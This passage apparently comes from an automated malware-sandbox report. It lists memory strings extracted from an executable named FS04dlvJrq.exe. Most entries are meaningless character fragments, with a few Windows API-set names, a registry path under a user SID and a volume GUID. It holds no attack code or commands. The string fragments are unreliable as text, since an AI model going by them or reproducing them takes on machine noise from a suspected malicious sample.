            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jhx_^[memstr_b31a9223-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4ff9>tmemstr_e050b051-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jwyf;memstr_bccf8538-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: af99tmemstr_75987cd2-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwj0_jf+memstr_00dede78-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}^f;memstr_a63c784a-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}xf;memstr_1e2759ec-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n;s|samemstr_ce9a3850-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$dtnmemstr_4f152869-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9d$<t]memstr_b9ee4ff2-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$ rqrmemstr_ba3acfaf-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$p3memstr_2dab2f3d-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ pv3memstr_12ba9386-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$dtmmemstr_044add75-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$qjmemstr_297638fe-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #muf9memstr_fd63cc0e-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j\^f90ujjmemstr_4344896b-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f90u;jmemstr_c872e061-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >_^[]memstr_f91e3688-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$vwhmemstr_b7643d93-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$@pvmemstr_9e17e7ce-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j%yf9memstr_1fb4bfca-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j\yf9memstr_41730213-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$pvsmemstr_4ceb472d-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$lhpmemstr_874ded13-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwdt[memstr_e646f262-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wyvjsmemstr_dcbfad7a-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4pvmemstr_0f2529b4-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j+yj.memstr_e77833c5-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~jexf9memstr_4188bbe7-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >jeyf;memstr_6f8b6539-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t j-_f;memstr_14ce0cdf-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _j+y3memstr_acb8fdfc-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =h#mvtomemstr_d11f592f-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =e#mufmemstr_df6a8730-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4svw3memstr_4bb5f7fd-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4jspvmemstr_1af0e96c-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$spvmemstr_c2696910-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150936552.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $2akkkkkkmemstr_186c19df-8
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 122658-36934pnmemstr_29dd9d48-3
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: icrosoftmemstr_ad0fd0d3-1
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wnowsmemstr_76bf80d3-2
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: `f0w fmemstr_3f8ef5a4-e
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \registry\user\s-1-5-21-2246122658-3693405117-2476756634-1003\software\microsoft\windows\currentversion\explorer\mountpodts0memstr_24e45cf8-3
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c\volume\{a33c736e-61ca-11ee-8c18-806e6fmemstr_b9877cf5-2
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 3}\*,domemstr_fe79af6c-7
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \38w#memstr_5d618aad-1
            Source: FS04dlvJrq.exe, 00000000.00000002.2313643353.000000000716D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0w\38w##h'memstr_2ad96639-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ext-ms-win-core-win32k-fulluser-l1-1-0memstr_1c11f4e7-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ext-ms-win-core-win32k-minuser-l1-1-0memstr_57517b08-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zu`zuccmemstr_ba94ac58-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4g5f8l879w9a9memstr_6a2ff3c7-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <$<k<memstr_52b6ee51-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =!=,=7=b=m=x=c=n=y=memstr_2f6c717e-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =>">memstr_ad856524-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?*?5?g?r?d?o?z?memstr_09503899-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5m8h8memstr_f1a74a79-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 112b2f2j2n2r2v2z2^2b2memstr_97279e15-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#4s4memstr_b2698b9b-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#5'5+5/53575;5?5c5g5k5o5s5w5[5_5c5g5k5o5s5w5{5memstr_baadfb75-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6m6z6r7]7v7memstr_0dac3113-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?&?*?.?2?6?:?>?b?f?j?n?r?v?z?^?b?f?j?n?r?v?z?~?memstr_02f6f249-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1-1x1memstr_32e759ab-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6"6'6,61666<6e6memstr_4bd8959c-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 727x7memstr_b78d902f-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7+8_8memstr_395cabe8-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9g9u9|9memstr_33740beb-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;v;[;`;e;j;o;u;z;memstr_ef530c14-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =f=u=memstr_19247eae-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1 2l2memstr_588ea5b2-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3"373>3d3v3`3memstr_388b3610-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5,585g5l5m5s5x5memstr_58c1ffd1-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%60686b6j6u6[6a6k6u6memstr_aa218acc-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8e8z8!999?9t9l9r9memstr_2c61628c-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :#:-:;:v:a:memstr_9f8e8ef5-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;b;v;];memstr_2ad5683e-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =&=f=l=memstr_fa6ee9b9-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >a>p>y>f>|>memstr_82400518-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >"?+?1?9?>?q?e?j?}?memstr_c624802b-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 0'0.050<0c0k0s0[0g0p0u0{0memstr_b8ae92fa-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1r1~1memstr_12ab3894-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4 4v4memstr_b16002d8-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_fd4a1541-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_80292a64-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: = =v=memstr_1c10670d-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4d6k6memstr_5684187a-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7"7(7c7k7memstr_d572ccd2-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 818?8f8l8q8memstr_0a2db061-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9+939i9memstr_5b3bb941-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:::f:k:p:n:x:memstr_791aa0e2-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;e;q;n<u<memstr_392480a4-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>memstr_936f3a34-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>@memstr_d048454b-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 708<:e:memstr_679a1cd9-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :&;c;o;memstr_71793058-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;7<s=\=d=memstr_8b669bc5-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =3?f?b?memstr_edf0c79e-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 010memstr_33c7a314-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1)121c1u1p1memstr_3eeb860a-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 122d2`2memstr_90013397-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 343`3memstr_98eb449f-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 343`3`memstr_e9998d08-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3!4%4)4-4145494=4memstr_35142566-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4a5e5i5m5q5u5y5]5memstr_fa4a4db7-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#3'3+3/33373;3?3c3memstr_b3a2de53-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 37:q:memstr_14220fc9-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :z;w;memstr_0ee487d0-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4#414=4i4w4g4|4memstr_4f4a54fc-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5+5?5memstr_d445d384-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6c7l7w8memstr_81a2612a-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9&:+:0:k:p:u:memstr_1345ad31-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1'2.2f5memstr_db7ad92d-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6,737memstr_abfcf352-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4y4memstr_1f2d8491-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5'636?6memstr_a447e402-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :;o;memstr_dd976214-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.<z<memstr_e061fffd-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t0s0x0,1memstr_d89f3e80-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0t0s0x0,1memstr_9c3b90cd-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5j6w6memstr_d37944ab-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :t<=>?memstr_aa7e4cae-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5-6`6s6memstr_336e22ca-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 888c8p8b8memstr_a52bd365-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%9g9]9o9memstr_ee65c6b6-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e:w:memstr_2d6239bd-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"<b<memstr_06614516-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=;=r=memstr_543f2e6d-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >$>j>u>g>memstr_6b4379fb-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)?7?i?t?z?memstr_a0270853-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 020r0}0memstr_4a0ccef6-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x 020r0}0memstr_0f1c07af-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1c1}1memstr_5fb12240-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9a:s:memstr_74cfd2bd-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >;?j?memstr_b2499def-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5o5s9memstr_ea7bb1a3-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;r;{;memstr_6de61600-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ='>,>m>{>memstr_d1f79e14-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 171d1memstr_01fd35ed-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2d3o3memstr_0fe03225-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4+5o5memstr_5d7d6661-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 516@6e6v6\6g6o6z6memstr_f0be155b-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 7(7@7e7l7u7memstr_c8a52fb7-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8.8u8`8j8p8memstr_21c0fc34-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;8;u;`;memstr_412c39d8-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;j<j=p=memstr_264d3950-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1f1w1r1~1memstr_accd8e97-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2:2k2`2j2memstr_c21a2731-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3%3@3g3n3s3x3u3}3memstr_e6342f6c-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4(474c4q4s4memstr_aca397d3-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5)535o5z5_5d5memstr_e287432c-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6.686t6_6d6i6memstr_f680b77c-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7,777<7a7k7memstr_aa79907f-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8f8j8memstr_260040fb-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 949?9d9i9a9w9memstr_998ce060-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:b:n:memstr_17ccbc06-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"=?>[>memstr_619eb751-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6.9m9t9memstr_b5e72a7a-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dc6.9m9t9memstr_b428dfd2-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=e=w=}=->f>memstr_244b3695-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >#?5?k?memstr_3e79a212-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j0p0m0memstr_b32c01a4-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0(4b4memstr_989ff764-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5!5[5b5memstr_795fbcd9-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6z6g6memstr_7e9cc840-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%7,7|7memstr_6f4bb07d-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9=9h9x9memstr_85c2acf8-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :%:;:e:d:memstr_6dd6ca73-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;c;a;memstr_afc03b82-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <1<m<memstr_43838161-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =5=q=memstr_6c39b571-4
